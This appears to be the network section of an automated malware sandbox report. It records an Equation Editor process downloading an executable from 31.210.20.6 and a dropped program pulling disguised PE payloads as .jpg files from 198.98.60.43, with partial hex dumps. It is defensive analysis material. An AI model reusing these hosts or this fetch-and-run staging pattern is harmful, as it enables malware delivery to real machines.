                                                                May 4, 2021 21:34:09.361008883 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361023903 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361035109 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361048937 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361064911 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361073971 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361080885 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361098051 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361110926 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361115932 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361130953 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361139059 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361150026 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361167908 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361170053 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361183882 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361200094 CEST804916531.210.20.6192.168.2.22
                                                                May 4, 2021 21:34:09.361206055 CEST4916580192.168.2.2231.210.20.6
                                                                May 4, 2021 21:34:09.361216068 CEST804916531.210.20.6192.168.2.22

                                                                HTTP Request Dependency Graph

                                                                • 31.210.20.6
                                                                • 198.98.60.43

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.224916531.210.20.680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                TimestampkBytes transferredDirectionData
                                                                May 4, 2021 21:34:09.213181973 CEST0OUTGET /3/Sugvt.exe HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 31.210.20.6
                                                                Connection: Keep-Alive
                                                                May 4, 2021 21:34:09.262763977 CEST1INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:34:09 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Tue, 04 May 2021 09:17:04 GMT
                                                                ETag: "3d538-5c17d8a9a6400"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 251192
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 29 12 91 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 6a 03 00 00 4a 00 00 00 00 00 00 ce 89 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 89 03 00 57 00 00 00 00 a0 03 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 b6 03 00 38 1f 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 69 03 00 00 20 00 00 00 6a 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 a0 03 00 00 48 00 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 89 03 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 63 03 00 c4 25 00 00 03 00 00 00 57 00 00 06 30 46 00 00 80 1d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 16 00 00 0a 02 03 19 2d 14 26 26 02 28 17 00 00 0a 6f 18 00 00 0a 15 2d 0b 26 26 2b 0e 7d 01 00 00 04 2b e7 7d 03 00 00 04 2b 00 2a 00 00 1b 30 03 00 29 00 00 00 01 00 00 11 02 7b 01 00 00 04 15 2d 08 26 06 1f fd 2e 09 2b 03 0a 2b f6 06 17 33 10 00 de 0d 02 15 2d 02 26 dc 28 04 00 00 06 2b f8 2a 00 00 00 01 10 00 00 02 00 19 00 02 1b 00 0d 00 00 00 00 1b 30 05 00 11 01 00 00 02 00 00 11 02 7b 01 00 00 04 16 2c 06 26 07 2c 16 2b 03 0b 2b f8 07 17 2e 73 16 18 2d 06 26 dd ef 00 00 00 0a 2b f8 02 15 1c 2d 2f 26 26 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 86 00 00 00 7d 01 00 00 04 2b cc 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 a8 ee de 51 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 1e 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)`jJ @ @tW,G8 H.texti j `.rsrc,GHl@@.reloc@BHc%W0F0.(-&&(o-&&+}+}+*0){-&.++3-&(+*0{,&,++.s-&+-/&&}}so}}8}+{o}{}}}{Y}{-+H{{X{X Q{Xa}}{o:q(+(


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.2249166198.98.60.4380C:\Users\user\AppData\Local\Temp\toqqx.exe
                                                                TimestampkBytes transferredDirectionData
                                                                May 4, 2021 21:35:04.267096996 CEST266OUTPOST /6.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:04.394546986 CEST268INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:04 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:52 GMT
                                                                ETag: "235d0-58aa827e4d400"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 144848
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
                                                                May 4, 2021 21:35:04.814322948 CEST421OUTPOST /1.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:04.942370892 CEST422INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:04 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT
                                                                ETag: "9d9d8-5562373312d00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 645592
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R
                                                                May 4, 2021 21:35:06.094985962 CEST1105OUTPOST /2.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:06.222722054 CEST1107INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:06 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT
                                                                ETag: "519d0-58aa824acda80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 334288
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
                                                                May 4, 2021 21:35:07.566735983 CEST1457OUTPOST /3.jpg HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 198.98.60.43
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                Data Ascii: --1BEF0A57BE110FD467A--
                                                                May 4, 2021 21:35:07.694489002 CEST1459INHTTP/1.1 200 OK
                                                                Date: Tue, 04 May 2021 19:35:07 GMT
                                                                Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24
                                                                Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT
                                                                ETag: "217d0-58aa825fc8c00"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 137168
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: image/jpeg
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 